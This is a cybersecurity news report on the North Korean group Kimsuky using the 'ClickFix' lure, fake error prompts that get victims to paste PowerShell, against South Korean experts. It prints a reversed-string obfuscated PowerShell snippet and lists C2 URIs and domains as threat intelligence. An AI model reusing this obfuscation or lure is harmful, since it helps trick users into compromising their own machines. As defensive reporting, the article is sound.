BURSTThe notorious North Korean threat group Kimsuky has adopted a sophisticated social engineering tactic known as “ClickFix” to deceive users into executing malicious scripts on their own systems.
Originally introduced by Proofpoint researchers in April 2024, this deceptive technique tricks victims into believing they need to troubleshoot browser errors or verify security documents, ultimately leading them to unknowingly participate in their own compromise through manual code execution.
The ClickFix methodology represents a significant evolution in psychological manipulation tactics, disguising malicious commands as legitimate troubleshooting procedures.
Victims encounter fake error messages that appear to originate from trusted sources like Google Chrome, prompting them to copy and paste seemingly innocent code into PowerShell consoles.
This approach effectively bypasses traditional security measures by exploiting human behavior rather than technical vulnerabilities, making detection significantly more challenging for conventional endpoint protection systems.
Genians analysts identified multiple attack campaigns throughout 2025 where Kimsuky operatives successfully deployed ClickFix tactics against high-value targets in South Korea.
The security researchers observed the group targeting diplomacy and national security experts through sophisticated spear-phishing operations, demonstrating the technique’s effectiveness in circumventing endpoint protection systems.
.webp)
The campaigns have evolved from simple VBS-based attacks to more sophisticated PowerShell implementations, showing continuous adaptation to defensive countermeasures.
Recent investigations revealed that Kimsuky has integrated ClickFix into their ongoing “BabyShark” threat activity, utilizing multilingual instruction manuals in English, French, German, Japanese, Korean, Russian, and Chinese.
The attackers impersonate legitimate entities, including government officials, news correspondents, and security personnel, to establish trust before delivering malicious payloads through encrypted archives or deceptive websites designed to mimic authentic portals and services.
Advanced Obfuscation and Persistence Mechanisms
The technical sophistication of Kimsuky’s ClickFix implementation demonstrates remarkable advancement in evasion techniques designed to circumvent modern security solutions.
.webp)
The malware employs reverse-order string obfuscation to conceal malicious PowerShell commands, making visual inspection nearly impossible while maintaining full execution capability.
A typical obfuscated command structure appears as:-
$value="tixe&"'atad-mrof/trapitlum' epyTtnetnoC-"
$req_value=-join $value.ToCharArray()[-1..-$value. Length];
cmd /c $req_value;exit;This technique stores malicious functionality in reversed strings, which are then reconstructed at runtime through PowerShell’s character array manipulation functions.
The malware further obscures its operations by inserting random numerical sequences like “7539518426” throughout command structures, utilizing Windows’ native string replacement functionality to remove these markers during execution, effectively creating a dynamic decryption process.
Once successfully deployed, the malware establishes persistence through scheduled task creation and maintains communication with command-and-control servers using distinctive URI patterns including “demo.php?ccs=cin” and “demo.php?ccs=cout”.
The infrastructure spans multiple countries and utilizes dynamic DNS services, with recent campaigns communicating through domains like konamo.xyz and raedom.store.
The consistent version identifier “Version:RE4T-GT7J-KJ90-JB6F-VG5F” observed across campaigns confirms the connection to Kimsuky’s broader BabyShark operation.
Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now
The post Kimsuky Hackers Using ClickFix Technique to Execute Malicious Scripts on Victim Machines appeared first on Cyber Security News.